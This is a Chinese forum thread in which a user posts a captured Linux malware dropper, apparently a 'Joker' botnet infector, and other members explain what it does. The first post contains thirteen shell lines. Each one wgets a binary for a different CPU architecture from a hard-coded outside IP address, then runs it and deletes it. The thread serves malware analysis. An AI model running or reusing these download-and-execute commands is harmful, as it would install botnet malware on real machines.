lonecloud 发表于 2020-10-15 23:25

大佬帮忙分析下这个linux病毒是什么玩意

本帖最后由 lonecloud 于 2020-10-15 23:46 编辑

抓取病毒的内容如下:
看了下,主要就是下载东西,然后将文件下载一个文件,然后执行
```shell
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/m-i.p-s.Joker; chmod +x m-i.p-s.Joker; ./m-i.p-s.Joker; rm -rf m-i.p-s.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/m-p.s-l.Joker; chmod +x m-p.s-l.Joker; ./m-p.s-l.Joker; rm -rf m-p.s-l.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/s-h.4-.Joker; chmod +x s-h.4-.Joker; ./s-h.4-.Joker; rm -rf s-h.4-.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/x-8.6-.Joker; chmod +x x-8.6-.Joker; ./x-8.6-.Joker; rm -rf x-8.6-.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/a-r.m-6.Joker; chmod +x a-r.m-6.Joker; ./a-r.m-6.Joker; rm -rf a-r.m-6.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/x-3.2-.Joker; chmod +x x-3.2-.Joker; ./x-3.2-.Joker; rm -rf x-3.2-.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/a-r.m-7.Joker; chmod +x a-r.m-7.Joker; ./a-r.m-7.Joker; rm -rf a-r.m-7.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/p-p.c-.Joker; chmod +x p-p.c-.Joker; ./p-p.c-.Joker; rm -rf p-p.c-.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/i-5.8-6.Joker; chmod +x i-5.8-6.Joker; ./i-5.8-6.Joker; rm -rf i-5.8-6.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/m-6.8-k.Joker; chmod +x m-6.8-k.Joker; ./m-6.8-k.Joker; rm -rf m-6.8-k.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/p-p.c-.Joker; chmod +x p-p.c-.Joker; ./p-p.c-.Joker; rm -rf p-p.c-.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/a-r.m-4.Joker; chmod +x a-r.m-4.Joker; ./a-r.m-4.Joker; rm -rf a-r.m-4.Joker
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.127/a-r.m-5.Joker; chmod +x a-r.m-5.Joker; ./a-r.m-5.Joker; rm -rf a-r.m-5.Joker
```

chboy 发表于 2020-10-15 23:36

禁止变相上传附件,请勿将文件后缀修改伪装成txt等后缀上传

lonecloud 发表于 2020-10-15 23:44

chboy 发表于 2020-10-15 23:36
禁止变相上传附件,请勿将文件后缀修改伪装成txt等后缀上传

那我把它删了啊

chboy 发表于 2020-10-15 23:46

lonecloud 发表于 2020-10-15 23:44
那我把它删了啊

版规这样说的

bigdawn 发表于 2020-10-16 00:38

看来要熟悉下版规,避免踩雷。

如梦SSS 发表于 2020-10-16 00:53

。。。下载执行然后删除,鬼知道执行的内容啊

如梦SSS 发表于 2020-10-16 00:54

你手动wget一下,然后看看是不是明文的代码

yunruifuzhu 发表于 2020-10-16 09:05

进入任意存在的目录 将病毒下载进去 设置文件的权限运行病毒 删除病毒

mokjf 发表于 2020-10-16 09:28

joker病毒吗,连名字都写着joker

JuncoJet 发表于 2020-10-16 09:49

是个有意思的病毒,拥有各种平台的编译版本
页: [1] 2
查看完整版本: 大佬帮忙分析下这个linux病毒是什么玩意


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn